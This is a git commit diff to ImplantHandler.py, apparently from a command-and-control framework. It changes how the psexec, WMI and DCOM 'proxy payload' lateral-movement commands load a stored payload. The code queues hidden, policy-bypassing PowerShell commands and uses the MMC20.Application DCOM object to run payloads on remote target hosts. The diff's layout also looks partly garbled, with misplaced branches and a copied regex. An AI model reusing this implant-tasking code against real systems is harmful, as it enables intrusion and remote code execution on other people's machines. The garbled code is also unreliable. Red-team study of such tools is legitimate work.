Fixed proxy payloads

2019-01-20 19:52:11 +00:00 · 2019-01-20 19:52:11 +00:00 · cf93e7c76f
parent 5a904b2008
commit cf93e7c76f
1 changed files with 20 additions and 27 deletions
--- a/ImplantHandler.py
+++ b/ImplantHandler.py
@ -824,18 +824,14 @@ def runcommand(command, randomuri):
    elif "invoke-psexecproxypayload" in command.lower():
      check_module_loaded("Invoke-PsExec.ps1", randomuri)
-      C2 = get_c2server_all()
+      if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
-      if C2[11] == "":
+        with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
        startup("Need to run createproxypayload first")
      else:
        newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
            C2[13], C2[11], "", "", C2[19], C2[20],
            C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
        payload = newPayload.CreateRawBase()
        params = re.compile("invoke-psexecproxypayload ", re.IGNORECASE)
        params = params.sub("", command)
-        cmd = "invoke-psexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
+        cmd = "invoke-psexec %s -command \"%s\"" % (params,payload)
        new_task(cmd, randomuri)
      else:
        startup("Need to run createproxypayload first")
    elif "invoke-psexecdaisypayload" in command.lower():
      check_module_loaded("Invoke-PsExec.ps1", randomuri)
@ -865,18 +861,14 @@ def runcommand(command, randomuri):
    elif "invoke-wmiproxypayload" in command.lower():
      check_module_loaded("Invoke-WMIExec.ps1", randomuri)
-      C2 = get_c2server_all()
+      if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
-      if C2[11] == "":
+        with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
        startup("Need to run createproxypayload first")
      else:
        newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
            C2[13], C2[11], "", "", C2[19], C2[20],
            C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
        payload = newPayload.CreateRawBase()
        params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
        params = params.sub("", command)
-        cmd = "invoke-wmiexec %s -command \"powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\"" % (params,payload)
+        cmd = "invoke-wmiexec %s -command \"%s\"" % (params,payload)
        new_task(cmd, randomuri)
      else:
        startup("Need to run createproxypayload first")
    elif "invoke-wmidaisypayload" in command.lower():
      check_module_loaded("Invoke-WMIExec.ps1", randomuri)
@ -905,15 +897,16 @@ def runcommand(command, randomuri):
    # dcom lateral movement
    elif "invoke-dcomproxypayload" in command.lower():
-      C2 = get_c2server_all()
+      if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
-      newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
+        with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
-        C2[13], C2[11], "", "", C2[19], C2[20],
+        params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
-        C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
+        params = params.sub("", command)
-      payload = newPayload.CreateRawBase()
+        p = re.compile(ur'(?<=-target.).*')
-      p = re.compile(ur'(?<=-target.).*')
+        target = re.search(p, command).group()
-      target = re.search(p, command).group()
+        pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
-      pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
+        new_task(pscommand, randomuri)
-      new_task(pscommand, randomuri)
+      else:
        startup("Need to run createproxypayload first")
    elif "invoke-dcomdaisypayload" in command.lower():
      daisyname = raw_input("Name required: ")